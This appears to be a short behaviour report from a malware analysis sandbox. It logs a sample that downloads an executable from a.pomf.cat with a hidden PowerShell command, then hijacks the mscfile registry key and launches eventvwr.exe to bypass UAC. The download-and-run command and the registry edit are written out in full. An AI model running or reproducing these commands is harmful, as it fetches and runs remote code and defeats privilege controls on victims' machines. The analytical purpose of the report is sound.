Technical Information
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\puttkk6.exe'
- https://a.pomf.cat/pesypj.exe as %temp%\puttkk6.exe
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/pesypj.exe','%TEMP%\puttkk6.exe') & reg add HKCU\Software\Classes\mscfile\...
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/pesypj.exe','%TEMP%\puttkk6.exe') & reg add HKCU\Software\Classes\mscfile\...' (with hidden window)
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\puttkk6.exe /f
- '<SYSTEM32>\eventvwr.exe'